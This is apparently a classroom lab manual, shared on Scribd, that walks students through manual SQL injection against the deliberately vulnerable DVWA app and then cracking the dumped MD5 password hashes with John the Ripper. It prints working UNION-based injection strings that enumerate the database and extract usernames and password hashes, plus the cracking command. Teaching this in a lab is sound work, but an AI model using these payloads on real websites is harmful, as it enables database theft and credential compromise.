Scribd
Upload
15 views

Lab 7 Manual SQL Injection, John The Ripper

Uploaded by

Nguyen Thi Bang Chau (K16 HCM)
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
15 views

Lab 7 Manual SQL Injection, John The Ripper

Uploaded by

Nguyen Thi Bang Chau (K16 HCM)
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 17

Lab 7: Manual SQL Injection, John the Ripper

Contents
I. Background Information................................................................................................................ 1
II. Virtual Machine Settings ................................................................................................................ 2
III. Manual SQL Injection.................................................................................................................... 7
IV. Create Password Hash File .......................................................................................................... 15
V. Proof of Lab Using John the Ripper ........................................................................................... 17

I. Background Information
1. What is Damn Vulnerable Web App (DVWA)?

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is


damn vulnerable.
 Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to teach/learn
web application security in a class room environment.

2. What is a SQL Injection?

 SQL injection (also known as SQL fishing) is a technique often used to attack
data driven applications.
 This is done by including portions of SQL statements in an entry field in an
attempt to get the website to pass a newly formed rogue SQL command to the
database (e.g., dump the database contents to the attacker). SQL injection is a
code injection technique that exploits a security vulnerability in an application's
software.
 The vulnerability happens when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is not
strongly typed and unexpectedly executed. SQL injection is mostly known as
an attack vector for websites but can be used to attack any type of SQL
database.

3. What is SQL Injection Harvesting?

 SQL Injection Harvesting is where a malicious user supplies SQL statements to


render sensitive data such as usernames, passwords, database tables, and more.

Lab Notes

In this lab we will do the following:

 We use inject always true SQL statements into the SQL Injection User ID
field with security set to low.
 We will obtain the username and raw-MD5 password contents from the
users table.
 We will use John the Ripper to crack the raw-MD5 password HASH for
each user.
II. Virtual Machine Settings
1. Login to Metasploitable2
- Start up VMware Workstation
- Select Metasploitable2
- Play virtual machine
Login: msfadmin
Password: msfadmin

Get IP Address: ifconfig eth0

2. Login to Kali
- Select Kali
- Play virtual machine
Login: root
Password: toor
Note( kali 2020 is kali/kali)

Start a Terminal Console: Application  Terminal.


Get IP Address: ifconfig –a
3. Login to DVWA
- Start up Firefox on Kali
- Place http://192.168.70.128/dvwa/login.php, int the address bar. (Replace 192.168.70.128
with Metasploitable IP address in II.1)
- Login: admin
- Password: password
- Click on login.

4. Set Security Level


Set DVWA Security Level:
- Click on DVWA Security, in the left hand menu
- Select “low”
- Click Submit

III. Manual SQL Injection


1. SQL Injection Menu:
Select “SQL Injection” from the left navigation menu.

2. Basic Injection
- Input “1” into the text box
- Click Submit
- Note, webpage/code is supposed to print ID, First name, and Surname to the screen.
Notes (FYI): Below is the PHP select statement that we will be exploiting, specifically %=$id.
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”

3. Always True Scenario


- Input the below text into the User ID Textbox ( See Picture), %’ or ‘0’=’0
- Click Submit
Notes(FYI):
In this scenario, we are saying display all record that are false and all records that are true.
%' - Will probably not be equal to anything, and will be false.
'0'='0' - Is equal to true, because 0 will always equal 0.
Database Statement
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
4. Display Database Version
- Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #
- Click Submit
Notes(FYI):
Notice in the last displayed line, 5.1.60 is displayed in the surname.
This is the version of the mysql database.
5. Display Database User
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is displayed in the surname.
This is the name of the database user that executed the behind the scenes PHP code.
6. Display Database Name.
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, database() #
Notes(FYI):
Notice in the last displayed line, dvwa is displayed in the surname.
This is the name of the database.

7. Display all tables in information_schema.


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables #
- Click Submit
Notes(FYI):
Now we are displaying all the tables in the information_schema database.
The INFORMATION_SCHEMA is the information database, the place that stores information
about all the other databases that the MySQL server maintains.

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,C
OLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCH
EMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_
PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,guestbook,users,columns_priv,db,func,
help_category,help_keyword,help_relation,help_topic,host,proc,procs

8. Display all the user tables in information_schema


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables where table_name like
'user%'#
- Click Submit
Notes(FYI):
Now we are displaying all the tables that start with the prefix "user" in the information_schema
database.

9. Display all the columns fields in the information_schema user table


- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(column_name) from
information_schema.columns where table_name = 'users' #
- Click Submit
Notes(FYI):
Now we are displaying all the columns in the users table.
Notice there are a user_id, first_name, last_name, user and Password column.
10. Display all the columns field contents in the information_schema user table
- Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
- Click Submit
Notes(FYI):
Now we have successfully displayed all the necessary authentication information into this database.
IV. Create Password Hash File
1. Create Password Hash File
Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy

2. Open Notepad
Instructions:
Applications --> Favorites --> Programs --> Text Editor
Paste in Notepad

3. Save in Notepad
Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save
V. Proof of Lab Using John the Ripper
Instructions:
1. Bring up a new terminal
2. cd Desktop
3. cat dvwa_password.txt
4. john --format=raw-MD5 dvwa_password.txt

You might also like